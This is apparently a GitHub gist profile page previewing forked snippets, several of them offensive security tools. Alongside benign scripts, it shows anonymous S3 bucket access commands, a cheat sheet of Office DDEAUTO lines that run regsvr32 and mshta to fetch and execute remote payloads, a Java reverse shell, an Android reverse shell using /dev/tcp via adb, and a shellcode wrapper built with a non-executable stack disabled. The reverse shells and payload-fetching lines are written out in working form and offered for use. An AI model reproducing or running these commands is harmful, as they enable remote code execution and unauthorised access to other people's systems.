Skip to content

Instantly share code, notes, and snippets.

Avatar

calfcrusher CalfCrusher

  • /dev/null
  • Italy
View GitHub Profile
@CalfCrusher
CalfCrusher / aws-s3-buckets-pentest.txt
Created Sep 28, 2022 — forked from Anon-Exploiter/aws-s3-buckets-pentest.txt
Useful commands while testing s3 buckets!
View aws-s3-buckets-pentest.txt
aws s3 ls s3://s3buckethere --no-sign-request ## Lists the file in the s3 bucket
aws s3 cp s3://bucketname/filethere.txt . --no-sign-request ## Downloads `filethere.txt` from the s3 bucket in the current directory
aws s3 cp test.txt s3://bucketname --no-sign-request ## Uploads `test.txt` from current directory to the s3 bucket
aws s3api get-bucket-acl --bucket bucketname --no-sign-request ## Shows ACL (Access Control List) of the given bucket
aws s3api get-object-acl --bucket bucketname --key fileons3bucket.ext --no-sign-request ## Shows ACL (Access Control List) of given object in the bucket
@CalfCrusher
CalfCrusher / btcbal.py
Created Sep 25, 2022 — forked from lukem512/btcbal.py
Retrieve Bitcoin address balance from Blockchain API
View btcbal.py
#!/usr/bin/python
import sys
import getopt
import urllib2
from optparse import OptionParser
def main():
# variables
btcaddr = ""
@CalfCrusher
CalfCrusher / Macro-Less-Cheatsheet.md
Created Aug 8, 2022 — forked from mgeeky/Macro-Less-Cheatsheet.md
Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet
View Macro-Less-Cheatsheet.md

Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

  • Using regsvr32 *.sct files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data   || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
  • Using HTA files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"
@CalfCrusher
CalfCrusher / C.java
Created Jul 10, 2022 — forked from caseydunham/C.java
Java Reverse Shell
View C.java
// Not sure where I originally got this from.
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class C {
public C() throws Exception {
String host="10.0.0.90";
@CalfCrusher
CalfCrusher / android-shell.sh
Created Jul 4, 2022 — forked from samiti3d/android-shell.sh
Android Reverse Shell
View android-shell.sh
#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"
@CalfCrusher
CalfCrusher / SimpleSecureHTTPServer.py
Created Apr 20, 2022 — forked from sakti/SimpleSecureHTTPServer.py
simple secure http server using python
View SimpleSecureHTTPServer.py
'''
SimpleSecureHTTPServer.py - simple HTTP server supporting SSL.
- replace fpem with the location of your .pem server file.
- the default port is 443.
usage: python SimpleSecureHTTPServer.py
Credit: https://code.activestate.com/recipes/442473-simple-http-server-supporting-ssl-secure-communica/
License: PSF License
@CalfCrusher
CalfCrusher / python-script-template.py
Created Apr 4, 2022 — forked from dkarchmer/python-script-template.py
Python Script Template with logging and arguments
View python-script-template.py
import sys
import os
import argparse
import getpass
import logging
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logger = logging.getLogger('upload_bom')
if __name__ == '__main__':
@CalfCrusher
CalfCrusher / shellcode.c
Created Apr 3, 2022 — forked from darkerego/shellcode.c
wrapper for msf shellcode
View shellcode.c
/*
Deamonized ShellCode Wrapper
To compile:
$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>
View pycat.py
#!/usr/bin/env python3
import argparse
import datetime
from functools import wraps
import socket
from ssl import wrap_socket, create_default_context, CERT_NONE
import sys
import subprocess
import tempfile
View keybase.md

Keybase proof

I hereby claim:

  • I am CalfCrusher on github.
  • I am calfcrusher (https://keybase.io/calfcrusher) on keybase.
  • I have a public key whose fingerprint is AED3 14DE 02E0 1CDD 47FA 149D 807E 485C 9B9B D04E

To claim this, I am signing this object: